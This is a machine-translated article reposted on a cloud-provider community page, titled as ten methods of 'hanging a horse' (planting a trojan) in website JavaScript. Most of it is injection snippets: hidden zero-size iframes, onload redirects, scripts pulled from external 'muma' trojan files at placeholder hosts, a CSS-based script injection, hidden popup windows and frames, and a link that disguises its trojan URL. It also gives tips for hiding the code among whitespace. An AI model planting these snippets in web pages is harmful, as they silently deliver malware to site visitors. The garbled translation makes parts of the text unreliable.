Web site Javascipt 10 methods of horse-hanging

Source: Internet
Author: User

IFrame src= address width=0 height=0></iframe>

Where the "address" can enter a malicious Web site links, etc.

Two: JS file hanging Horse

As long as the JS file, can be maliciously modified to be linked to malicious code, generally quoted by the entire station JS code is most likely to be linked to the Trojan, detection we can see the JS code on the left or below, the bad guys like the malicious code and normal code between a lot of space or return to hide, So to see more JS code page has been deliberately elongated and so on.

Three: JS deformation encryption

<script language= "Jscript.encode" src=http://www.xxx.com/muma.txt></script>
Muma.txt can be changed to any suffix


Four: The body hangs the horse

<body onload= "window.location= ' address"; ></body>

Five: Concealed Hanging horse

Top.document.body.innerHTML = Top.document.body.innerHTML + ' rn<iframe src= ' http://www.xxx.com/muma.htm/' > </iframe> ';

Six: Hanging Horse in CSS Tutorial

Body {
Background-image:url (' Web Effects: document.write ("<script src=http://www.xxx.net/muma.js></script>")}

This way is more ruthless, but also more difficult to find.

Seven: Jaja Hanging Horse

<script language=javascript>
window.open ("Address", "", "Toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1 ");
</script>

Eight: Picture camouflage

<iframe src= "net horse address" height=0 width=0></iframe>
</center>

Nine: Disguise call

<frameset rows= "444,0" cols= "*" >
<frame src= "Open Web page" framborder= "no" scrolling= "Auto" noresize marginwidth= "0" margingheight= "0" >
<frame src= "Net ma address" frameborder= "no" scrolling= "no" noresize marginwidth= "0" margingheight= "0" >
</frameset>

Ten: Advanced Deception

<a href= "http://www.163.com (confuse connection address, show this address to point to Trojan address)" onmouseover= "www_163_com (); return true;" > page to display </a>
<script language= "JavaScript" >
Function www_163_com ()
{
var url= "NET Horse address" ;
Open (URL, "NewWindow", "toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable= No,copyhistory=yes,width=800,height=600,left=10,top=10 ");
}
</script>

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.